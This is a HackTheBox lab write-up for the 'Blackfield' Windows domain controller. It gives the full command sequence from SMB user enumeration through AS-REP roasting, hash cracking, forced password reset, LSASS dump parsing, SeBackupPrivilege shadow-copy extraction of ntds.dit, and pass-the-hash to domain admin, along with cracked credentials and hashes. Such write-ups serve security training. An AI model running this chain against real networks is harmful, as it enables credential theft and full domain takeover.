HackTheBox Blackfield

Machine Synopsis

Key Exploitation Techniques

• AS-REP Roasting to crack a Kerberos TGT hash
• Abusing the ForceChangePassword permission on a low-privileged account
• Credential dumping from a publicly exposed lsass.zip file
• Leveraging SeBackupPrivilege and Volume Shadow Copy to extract the NTDS database

Enumeration

➜ Blackfield nmap -p- --min-rate 10000 10.10.10.192
...
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

The service profile clearly indicates this is a Windows Domain Controller running standard AD services.

SMB Share Enumeration

Checking for accessible SMB shares without authentication:

➜ Blackfield smbclient -N -L //10.10.10.192

        Sharename       Type      Comment
        ---------       ----      -------
        forensic        Disk      Forensic / Audit share.
        profiles$       Disk      User profiles

Accessible Shares:

• forensic
• profiles

User Enumeration via SMB

The profiles$ share contained numerous user profile directories, providing a goldmine for username enumeration:

➜ Blackfield smbclient //10.10.10.192/profiles$
smb: \> ls
...
  AAlleni                             D        0  Wed Jun  3 18:47:11 2020
  ABarteski                           D        0  Wed Jun  3 18:47:11 2020
...

➜  Blackfield smbclient //10.10.10.192/profiles$ -N -c "ls" | awk '{print $1}' | grep -v '^\.$' | grep -v '^\.\.$' > smb_users.txt

Initial Access

AS-REP Roasting Attack

With our username list, I targeted accounts with Kerberos pre-authentication disabled using Impacket’s impacket-GetNPUsers:

➜  Blackfield impacket-GetNPUsers 'blackfield.local/' -dc-ip 10.10.10.192 -usersfile smb_users.txt -no-pass
...
$krb5asrep$23$support@BLACKFIELD.LOCAL:72c34522cb3f7d8cfa549e240d360c7c$d510537eef809c51dbfc5a1754f73276292eeddfd9f680b02f229bbe464de1713dfd69cd791311f65508cac8dae5bb66223fa0454e17af18dfc69ba470f88c4fef50a41e4673c4ad5ebc6728573e8a279132b04810722b22391d4ae4a7f3cceb6feff5f2fff41ca34f0cae2e97491f1e63468f1e1226c2847d818d9a1b3e97abf77de7fcc2faa830a785a27f01a7e419e7ffa12d19e23facf5ef50fff7f6537f3dda8bbb48020bf601b977a4de79fafb4bdc1898b2a222f63eb1c5a00f3f651e4444ceafa6572c18ed425903a78eb3ff9c3c3c1d3623b79fb91a85a64cd2b3b2d868e57b546e9f13d85b7e9c887885e268af5136
...

The support account had pre-authentication disabled and returned a crackable hash.

Hash Cracking

Using hashcat with the rockyou wordlist to crack the AS-REP hash:

$ hashcat -m 18200 hash.asrep /usr/share/wordlists/rockyou.txt --force
...
$krb5asrep$23$support@BLACKFIELD.LOCAL:72c34522cb3f7d8cfa549e240d360c7c$d510537eef809c51dbfc5a1754f73276292eeddfd9f680b02f229bbe464de1713dfd69cd791311f65508cac8dae5bb66223fa0454e17af18dfc69ba470f88c4fef50a41e4673c4ad5ebc6728573e8a279132b04810722b22391d4ae4a7f3cceb6feff5f2fff41ca34f0cae2e97491f1e63468f1e1226c2847d818d9a1b3e97abf77de7fcc2faa830a785a27f01a7e419e7ffa12d19e23facf5ef50fff7f6537f3dda8bbb48020bf601b977a4de79fafb4bdc1898b2a222f63eb1c5a00f3f651e4444ceafa6572c18ed425903a78eb3ff9c3c3c1d3623b79fb91a85a64cd2b3b2d868e57b546e9f13d85b7e9c887885e268af5136:#00^BlackKnight
...

Credentials Obtained: support:#00^BlackKnight

To map the AD environment and identify escalation paths, I used BloodHound for comprehensive enumeration.

➜ Blackfield bloodhound-ce-python -d blackfield.local -u support -p '#00^BlackKnight' -c all -ns 10.10.10.192

The BloodHound analysis revealed that the support user had the ForceChangePassword permission over the audit2020 account. This is a critical AD misconfiguration that allows a user to reset another user’s password without knowing the original password.

Exploiting ForceChangePassword Permission

This permission allows changing another user’s password without knowing the current one:

➜  Blackfield bloodyAD --host "10.10.10.192" -d "blackfield.local" -u "support" -p "#00^BlackKnight" set password "audit2020" "P@ssw0rd"    
[+] Password changed successfully!

Accessing the Forensic Share

With audit2020 credentials, I gained access to the forensic share containing sensitive files:

➜  Blackfield smbclient //10.10.10.192/forensic -U audit2020
Password for [WORKGROUP\audit2020]: P@ssw0rd
Try "help" to get a list of possible commands.
smb: \> cd memory_analysis
smb: \memory_analysis\> get lsass.zip 

Memory Dump Analysis

After downloading and extracting the LSASS dump, I used pypykatz to extract stored credentials:

➜  Blackfield unzip lsass.zip && sudo pypykatz lsa minidump lsass.DMP
...
== LogonSession ==
...
       == MSV ==
        Username: svc_backup
        Domain: BLACKFIELD
        NT: 9658d1d1dcd9250115e2205d9f48400d
...

Extracted Credentials:

• Username: svc_backup
• NTLM Hash: 9658d1d1dcd9250115e2205d9f48400d

I then used evil-winrm with the svc_backup NTLM hash to gain a shell on the target.

➜ Blackfield evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

Privilege Escalation

After gaining a shell, the first step was to identify the privileges of the svc_backup account using whoami /priv. The output clearly showed that the SeBackupPrivilege was enabled.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

The SeBackupPrivilege allows reading any file on the system, including locked system files. My strategy was to extract the NTDS.dit file (AD database) and SYSTEM registry hive.

Setting Up the Attack Tools

I downloaded the SeBackupPrivilege abuse toolkit:

➜ Blackfield wget 'https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll?raw=true'-O SeBackupPrivilegeUtils.dll
➜ Blackfield wget 'https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll?raw=true' -O SeBackupPrivilegeCmdLets.dll

Then, I uploaded these DLL files on the target machine using evil-winrm.

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> upload SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> upload SeBackupPrivilegeUtils.dll

Creating Volume Shadow Copy

To access locked files, I created a Volume Shadow Copy using diskshadow:

➜  Blackfield cat vss.dsh 
set context persistent nowriters
set metadata C:\Windows\Temp\vss.cab
add volume c: alias VSS_C
create
expose %VSS_C% z:
➜  Blackfield unix2dos vss.dsh                                 
unix2dos: converting file vss.dsh to DOS format...

Why Shadow Copy: The NTDS.dit file is locked by the AD service and cannot be copied directly. Volume Shadow Copy creates a point-in-time snapshot where files can be accessed without the locking service interfering.

# Upload and execute the shadow copy script
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload vss.dsh
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s vss.dsh
...
The shadow copy was successfully exposed as z:\.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeUtils.dll

# Copy the NTDS database and SYSTEM hive
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit ntds.dit
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg.exe save hklm\system system.sav
The operation completed successfully.

# Download files for offline analysis
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.sav

Using impacket-secretsdump to extract all domain hashes:

➜  Blackfield impacket-secretsdump -system system.sav -ntds ntds.dit LOCAL                       
...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
...

Logged in as domain admin using pass-the-hash:

➜ Blackfield evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee